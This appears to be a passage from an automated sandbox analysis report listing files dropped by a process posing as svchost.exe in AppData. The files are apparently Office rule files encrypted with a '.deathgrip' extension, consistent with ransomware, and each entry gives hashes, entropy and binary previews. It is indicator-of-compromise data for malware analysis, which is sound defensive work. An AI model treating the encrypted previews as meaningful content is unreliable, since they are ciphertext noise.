                                                          Entropy (8bit):7.934239568175516
                                                          Encrypted:false
                                                          SSDEEP:96:hYWb2Jh/a6EiVBDOKfnl3UUU/uceRBnDhxd25YYz9KT:uWSJhVEOBDxaB/uceRZsX9KT
                                                          MD5:A405767527AF8EA112D934081B79432D
                                                          SHA1:08C5CC4B9ACBB6680AD73C9ADC25B05DABCF756C
                                                          SHA-256:25A51BE1FC3EEA852AB7F56475CD76B792FD515F47A82047DBCA79AC57549A3D
                                                          SHA-512:84A90635A993374D4F6DA5D72F00D8F2A16F04642C3DE51BD6D89E02025181A542F0964388502FBD9BA4867C957D589E97B45976863EAF1ED8D21BF718ED2EFE
                                                          Malicious:false
                                                          Preview:........z_K...J.5....S.....E3..g..u.D..:.....v[..H..s`.+...T.Y.TM`R...........6x.K. 9....@|.5...k.....\ a.;9a..w.1e..E.....JSW..6.!....v....E.m./i.S.-......q./..p$.=0..[].f.:9.. Ts..{....C=D..D.N.....t.s.m....Z........N...*.<..@...{..K.~G<....+.M....!......g.6...7..vx......u.:a.mR..lDO..N....[....0..)=..t.h.."*p..9..C..9....@.B....@ll.*Y".^...N.....o.pw.z..S..a."HC.....t...<..n....>.....P.Jx..5.qt M.L.[..>m?..,.ovR'.H.....q.....GkE..H..o..."..i.d4...Y...VY.#...F,.e...6C....Bu...k.!.*.>.}KdWt.n.....nM}>....bB.W......u..w=j..p.....%B.A.Z"eY...W.v...C.+.^..<F..f..t....-..H8.KU.O/z.B.Ss.[..c.:.P.m...m.:.'......5.3..xB...@..w...nSt...(SuH..8....D.m.'...9...A-+...2....7....X.c..5..].U2....U'0.........4.>.........6...s...B.-..F..>r.#.(.....n#.2.R..:..n._jl..H.;Z..e..*c..y.K...<..,.8sn5.w......S..h...C.....u.%.-g..IY.8.\.4..w.R.....}.......H......{.e.TF........6...F....1.o.........w(..M.^n.#..^..`.~......Y...:..k...y`g.. .)._ .J...,..?..c.u.pp%B...c

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120602v8.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120602v8.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2944
                                                          Entropy (8bit):7.891418139197436
                                                          Encrypted:false
                                                          SSDEEP:48:Ii5tOQSAEXVyosYUqxvt/8MKfnOhQhbpsVhVKfO/wwgUdBxr8pv8+NSrBMSh5Jav:IwOExosYTptU2QhbpsLb/wwgUTxr8J84
                                                          MD5:EB65B04819D49FE234AB3A212879FF98
                                                          SHA1:58C294CFD228CA3A39FDBE6C9B500D36606790D5
                                                          SHA-256:64AD36DD5B7C90EB27AB20FCA7067BFDB4995CD78F6AD8610B5A2D8B261B83D6
                                                          SHA-512:87CFE38DC1F544DE5795138B4C7CC68106B509EF6E74646E22C5C2EEC6FAF019BD11C843208C812E2B94ADC56A6A4FB0C2C6F5360FC7601892B69E2840DDE981
                                                          Malicious:false
                                                          Preview:..........aw....3..X._.'.......[c=..]T...Z...{..@..s."..Px......5.6q}s..f..7.....1W.l...p.Da...x)@.\....b].A....&d..y...Ix.7K.....i..oHkA\..6.m..~..Q.k.1.%7+..x....J.,.a4...q...9...B'......\.<:Sr..'..."P&..T.q.:.. .....i.,.az.S.iX.9..A.....0A..t.#``+.)1...p.P)&....]....OS....%.a...?..nq.u...a..K.....t...(.."L..-9J.....i.....|.;.Cos.1J.....$...7&:..B...].*..........a../.E.-.Z...L._...-W.T>7.K.Y...%...M.....3iM.......$..mJ1.h...e.``S..h .....H>.^..;..<yB./.....n~0.....).naA.9.....7(.}Qz..1B.R..G*..c....80.,.....d.&.3w..L..L...Y...h:o.r......c.!#.../.)Ewl.w.(.K..61.>F.~&<..Oo..mc=..D..Z,..=q._'.HM...Uvpw...|../.e,h..(&.....Ul1...4.....b../t..jS...3..-..z...C@)V,.w....G.4..l+%.;...6.....q?MH....Q8....c...q.Y.F..-H.M.\......z...9)....6..y.:...o.K...R.$.Z.{...a.l.Emx-.l9..q..q.K65s+.........f..G..?.v.Z..0L.$_.../..l.-y:".....*.)^.mR...f."@t.@.........Mf...t.N(.U.9..@Gm....mKui.[....5(5.{..K.A...v.........B..z...teX..c.1..43.h.P...[_.A......+..i..p_\]..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120603v8.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120603v8.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2480
                                                          Entropy (8bit):7.880425685066334
                                                          Encrypted:false
                                                          SSDEEP:48:mf3LZEd1Itx/RpSlOpMZzTje3kIpxReezvyHWqRyHgmd6K6VU7:mgutx/2lOqZ34XaWvAmR6VU7
                                                          MD5:40A88920817969447B7D6A721D9C57FD
                                                          SHA1:15C477643E6A7C0AED3D48772605A11C2A0FAB31
                                                          SHA-256:9623C68740060035F321478FBF3C998A1A5A7323EBB7C7D4285E1C1AACF11367
                                                          SHA-512:184895B92239315D7726B88E811880806A4827BB44296A44C07BFDC5BB3E1155779549ADFB701E869856AD395B2E04D970749C1D036A4ACF65B5BB06D258C344
                                                          Malicious:false
                                                          Preview:...........>t.m........;...>.Z9..."...o.........r+.~....1..O|1.F......1.C..W~....g........\.D.w..w.. .*....M.&..s...}...@..v...t$Q...w.#.%`....M.......R6.!.l...u....u.-......C....(x..b.."........Q..F..X.A.`&....^...c.......{v.be.3..m...-M......T...I...z6 ....P3.^....r.....k.......aA.i.Y.._I.x....R.....Z...d.6..S.t..gs.<}06..Z>v..rQ.$...M.<......:.....xAB^......C.a.t.,}$S..e..~..(..}ad...D..e....x7^.H.X%D....r..U.1.a.Ce/..k.Hv.|.......v...2.w.V....?.~..WM..FD...ZI~..i.$5RJ.m:..>....F..........0 .h.......&.#nd\.\.kM.k.$..z.c_+a..9z..N.eyn...S.|.../!..f.k...Q.FC...$;..b:.k..HG .I.3..;C{.c..Wm`<..9..Y.8...N..yx...k..+......j....-d....i6.w.R..~...$z.'Uu..+.W....Z.N.A.....F)..`.aW|..`...n|M....,v....kF..#/...X..._..(.E....i...7..a.E.V...U.b....a..4..)M...W...O..@.s......G........p...k0|....:.......WJ3...mw..nt.n.6..W./..n....e.9...vRL..Km .i..(...GoU.......:.NRcv`c...1f..-.h..9..~.?.r..r.XJ...B0&..$.Z.:....0...*..........-.Y.-t...&.2......`..../R

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120604v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120604v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):784
                                                          Entropy (8bit):7.391644650242055
                                                          Encrypted:false
                                                          SSDEEP:12:ESf/4IAqLHBq41v9Lq2jWQAvB3V5NomIkfrimFOvvJ1KrUoDYb8BcH+OaK9c2MW4:ES34U7BqoJh4vBNom/imIh1KrhzOaK9i
                                                          MD5:CFED908FA48B551F7E7CDEE362B53C39
                                                          SHA1:C9A72714BA842E61A9DB6B495E61B00443A39DB5
                                                          SHA-256:19A83591AA6B65148D8D5B8D02BD6B84D73B2A4E3F0D1679BEAA1DC76D26D6BA
                                                          SHA-512:B911C31C9BE848CD2F61751F985235EBEDBE97DB7511AC90A1BBF12B59B9419D80271481625DE74516D563C5F0E01F77BBA329829DBA0D5F6C3532ADFD578B45
                                                          Malicious:false
                                                          Preview:........@..Z...~....2dQ.e2'...YnB.`..x..E..1.@.o..Qrb.#2.}..E....x...2.M...d4=....,^d..I.E.....Ra4...^....w^:...}B.....0.....P...G.w..Q..@.....I......:I$Q~..`.8.;.[D..UY | S.....OS...Ps.C~..y.......;E....D.-...UG.UOj..>D...qQ:.P..]V3$]g..86....oa..A@...v.R..f(.s....m.`...Z...n.).M.8..i......".\.....0.M=*.0x(.8.-...gex.).n..._.|.7.f.Af..d.g...{......z.T 87w.E.ccc.i..s.&.'...5.M...I..#.n.6%.J.;s.k...f.Y#.../r..tSwXG8SqXqlq4qsiO3QAqBeY/2wrUeLqSN7vxUTiadbQRvSRKlmHplOoodlVrTRTWmNNj0TPrfJCiTkVv9HhV6whspWmNGBlgzmbJHhruLjrL30HsiKk7UPdNC8KGhrOC47Qe25Ih8hTK9Nzwjpz3ttciU1oo7bFWu0Q9N1T093mYr37pq1C7sGquAdGNdM0jogVaoCIqO6p93MlV79Jy/Yt9AEMBuZYFh9MLGij6db2oA815LShRPOvC/0dnOehxJ/jOs7jZwvS2jLnkpoNjyGD4fNGKPFQTJ3DSIIEhShJcIpOzXsTACyDzx/qH6VAg70zDPFpdkg1EGGLvhHuGw==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226003v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226009v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule230161v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule230161v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):944
                                                          Entropy (8bit):7.575709099348545
                                                          Encrypted:false
                                                          SSDEEP:24:DpvI0NqaL6cj7RMpDeG9mrNKO7bW4xmdmQ:DpJ6cyRecO9Vxwl
                                                          MD5:117D9053B4D00DAA54889C9301D70E54
                                                          SHA1:00D14EFA732D4617F4821978C41F802B76F2259C
                                                          SHA-256:CBFCF3779BDC0C893AF42EA94CEAFC86EEA8E87E01AAD0C683FC1808DB7EE643
                                                          SHA-512:79E5C8354E3ED6C121B5D0A9CE596A432D14E76FDCEBC76371E70EE9ED668443B4EF98EF154C346373CC3FAAF3F7B4DE3F12092349D0960B031B880EBDE3BD4A
                                                          Malicious:false
                                                          Preview:.........Q..<..Q.|.<J...0?..ov....ga.....i8.....5....@.=....i..,Ah.<@.2....e)..#L........' .)cR...y.#]1...H..:.~.'7. I]..+..e...c..ucv....N.J....jw...jbwK+.X.2..,&|.C..!.k].....\....`.N8.dz9....B!.u.>.s...su.<...{|.....=2\..bP..q..yV.N.a....p......-.._.nK....2b.:.O7)*B...d...x6\.E.$.X(.3....bX...........uS.1..:\q.VT..o....j.V..WN...$c.d&g]....Y..r......W..."]...0.|#.+.:..)..V\.l.....KP..&..O.G..6}.....p<z.....[...n..._./.K..HX.<?.Dn].:.].'.6..dT..I.....S`.$.Q..:Pq.~.m?..(.e.......0.......|.Q......[.....9.(.6.H...[..&x.......... `....Ev...%B...4.....y.[..YmZtRC08jicb/baP8IUCfj1WcZD8FqYvq95XLfEnU3UFVjEoAj8H9iCX98W3m/fe1x2rn0+AVedRY91UcOcaZE0blY9JLRB3uIeHPzNDu+d3tKnWbxBJ637epADgSPdMeKpX0MFfCq/61iwrajmgz1NxgOyVVlSb9SA2GpTe4A7fGmywwfj2LVntIPLyNIXAKUMtLtUcuO43J0l0WDNn5jG4Ls2ebVk+R69/8TQVLVVmh5KdhHI6RaM2PsSGAKv8BRRLU/ALZjyxiBqRrKu1daoMhOyrPcr0eIg9M7rLC3vIjckWtCod8uARkXAg0TE9vyT0UFoAy2xPiqvhs+ZaOWJg==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23068v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23068v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1040
                                                          Entropy (8bit):7.631434556001951
                                                          Encrypted:false
                                                          SSDEEP:24:CfRcmVCvI/bBP4NKiC6wvnna+jOFfoT9/p3BX9O:CfamVCvIuNKKInjO2/pxXM
                                                          MD5:59A903472EC0C25998CAD1C8B9EC40C2
                                                          SHA1:03C59E00A07D2D2FD232BAC15CF7CAC0F1F7500D
                                                          SHA-256:DAE0BB08DF54F12F7568347533DD3C4EC96D70ADC33F370C8CDEDAAD285E729D
                                                          SHA-512:311851A0F69DB0766BA2422FE2B44B728882F169809524C8A2C415A8AF7E6208F115A3AF6F910FF32F863B771A503D973731626B9F57906821178651B78ADED7
                                                          Malicious:false
                                                          Preview:.........*...F..-...S..!.R...,........Qs".fm._..MtD.......|Q..a..j..\....1*...o$}...(i.R=..J..:..;....'b......y..,.!.{..R\+a...~...L\Q.|.q...5s...OTs.v.k.....zL.a...[...?..+l.-?.s*....qN...@.j&9.....Z...7r...B....8RI..t.z}...k..Qw.HX{..i..$..tR.a......t...3...j....a......Y.0.Q_...&..1.z.7.,Q.R.W.s.h...a...........j.-...f.9P.......?....,...j....x2.|p..Lh..$.*:.y..u.)...'0v.EG.C..a......McJ..=yt'...gv.:..Y...#.'..U[t.....(.U..%..^.`^.....`.........8X.....[........@N....*%.T1/.l.....+.TK\...H.AE..A..._,.^X..D..p/F"....%..........z....G...>U*..N..q....x.`.7.^.p.`{/.g.(hi&..ej@6.t.........>t..{.yq..9..]a(......9..<.....c.e......1.j._.mY...V.G.?h#5.8F.WLmbP37h/NlRT9hTZJaslobrRI/tTFlD2kZ1R3PZZN+kTobvqXNZ8mLeExd1cYdm2CDbG/5E9pNqGNP4ykfAQ8GrN1gWFK2xwNqk3THOy+EzGSeiXV+iony6JTuthq6q6LZyxz9ngN/HSVj4Z6IB7XAjWhX8Yzh0jMJNcMTD7Q3VeJ1h97PWG63cLqORDfm1VW8dh+MMTxJwI8SkHQa6Ic2SLgQyPNkoWKAf2XYjY1vaia9eNBqMhWkxW6hkMb1PuL+eGhklsG0cpFq3m98ewKTXb2Mwym+Tn3Czwx5iAraQeq3hrC

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23070v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23070v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23120v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23120v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2672
                                                          Entropy (8bit):7.899329611980788
                                                          Encrypted:false
                                                          SSDEEP:48:5V9Fd8AsuEPEtgn9ZX9v2YJOsvs2ppF4c3lCd2eBoXy51fygamg+u:nFQP5tNTvHnFr142soXyKgaOu
                                                          MD5:770A0A0DE9AB28FFA4B7359D148342B4
                                                          SHA1:10E382E84B9B0FE7945B49044D6EA95B05D94A48
                                                          SHA-256:29047CD1BD31DF621EE0C7F0BF808EB9049B413A48A88EAD39EB264CD19518CF
                                                          SHA-512:D329B36E1F0BDAC730D7A886CF23DA473911319E867941EB07ABA708966DE4F6AB21BBBA1FA57A55A1ECDBF9B569494DCAE96016DD9EBD17F77AF522E940D658
                                                          Malicious:false
                                                          Preview:.........n..bC..$%..._v....c.....U...3Yx......,=.....r....X.Y..l%.(yr,V.C.:....yu...`.2....)1.2..8+...D_.m...lt..2.~.z.x'\`.......|P...Z.:2..8...u..m].b.$..K.7......EV.(..F48..,..._K....?f.L.F.GH.N0......|*p....jg.......W.i.G.....uL.x+....@...$...... .5..../=.E.\......u.M~..G.3........K.*.A.>.1O......}.1....!.l...]Y..~p.e...Hr.sMsq...#>...L>.*2..dl+.4......X^A....!....5k..lA...G.....l.!2J.'...+.ab..R.>......r".W.D.UG6G.u)1....x..%..TS....DU.J...Le..<+.@.)Z...M.....>.yk.... ..y.~...T./...@|...,..4.5j6...] xf.UO...5..`.S......vmW.r..l..s..D..{.4P.Q..8x.[.,.Ik....l.......jY...1...M..QJ{=.y....=....'.?.mzk..w...."...p/....G...%...a..ax=.r^.....>....U....x.}....@.TD....'.k.u..aj"hSk.b..&d.7.w.[.`K..ID...&.l.{.,(.c.....5.C.*.A@......A....p....6.C.\.."d.A..>.T..[...D...J....n9j..".i.U......"....}].....dQ,....qa..i..._...t$...@..o...o....CZ...AC8..]n.E.L..x..Be/..._..J.PZ"...............w.. ."Z.h.'....J.I.H[#..z..n.XP....#..].`K..2..D

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23122v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23122v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2272
                                                          Entropy (8bit):7.8784948496523155
                                                          Encrypted:false
                                                          SSDEEP:48:TiDs9tl3RvCwwn5mxNZtsoL9etDOh/A00EJDLfpnKGWaM:TDfKPn5mxNjfL9Wih/gEVFGaM
                                                          MD5:D6A22E2ECC609A0E476F54DB51F7AA6E
                                                          SHA1:56450D07FABE56E6DC346CC3EB11D95D1089B7BA
                                                          SHA-256:049324340FE1999D99AA8ECFDFE606EBEF712819922A1BE3459A7C51A37C860B
                                                          SHA-512:EE4A6DB7AF4DF80D53895D20DFF7BD70DEFCFFD100253AF29193935EFE6442CDB369A3E2E8CAA82A064158C937C98DC3CDDC4722C99CDA44A986B9CA29E442EE
                                                          Malicious:false
                                                          Preview:..........5..`......mXs..u..........`wx..F'.^....5a+P.K..|.E..ZC7..K.._^8..pAg....B..F.....p..p<.......#.q.....&.p.(...+|...-R..(.ZJ.JM.%...s....."=.|...:$........L...^+..Son*..N....Gj-Q.a..E.Ng.?.q......IJ.=$z.{d.0.7.....i.(*$....H.7.3.I...Y...;......a.q.b..(Y...=.8.......f.P.'iB.......])...,.u......wD..V..S..bZ.w0....7t../..M......N.M..S=.O.+3.E....X.f..b8..].F....+@T..a.u...%..[.\...xV.UQp...-l.4..a1a.lMu...k..r@.._Z.7..].1RH...I...o.H.}<.!....U.|...Q..[..|).Q...;...Y.?{.mT....=..j%.'..7~.@...D.{...j.....X{Y\..o.x...i<....E..../..........WdE.}D....El....ra...!..WoD.2..9.?.K...m./....K#..).~^.%.p]..0.U7-.DM...-..J..) .....3o.......A..+L>.....t..S.....b.b%.|...&[.+.~QrAK.l.....b^X.2..M.$E.P.?')Lc...-\O.>*3D.... .uq.iD....h.S.}...G....JYC.l'....+..f.P=...o.Y.d..{.W.{"..q.k...?.....l."........'. .@......yf....[Q.9%:.c1.$.~..t.....x\........(...2."..2....<aLP/....J...K....r.&oKd../>T......ch.....n....6...@.,.=@?.).m..<4.ja5...k.B.Z...]..C

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23123v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23123v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2368
                                                          Entropy (8bit):7.886236704485951
                                                          Encrypted:false
                                                          SSDEEP:48:TZBqQh3G+Y9Iy9LVyoxtVJ+qTUZaorjgHtgtSDyXjkI22JYDSbU1jVo:TZBqQbY9rfJxAqj4jsG22JMYUQ
                                                          MD5:ADDD13C38F08C6E460D47E6F9BB7D0EB
                                                          SHA1:328D79D590E3E68BC925576696A267B8574CBBF2
                                                          SHA-256:41DDB2C263514653FAC2B86D6C82673CCF7F72D21834AA7B8E3A87261545CF23
                                                          SHA-512:10BEBDFB936A8BACE5F0F0A74AC5984FDB155DA41DF459F6602362185BD3E353F9CEEFD587D2679349B494805FFC8D6DE88B7B0CF4FB0C7052B4930E215FC321
                                                          Malicious:false
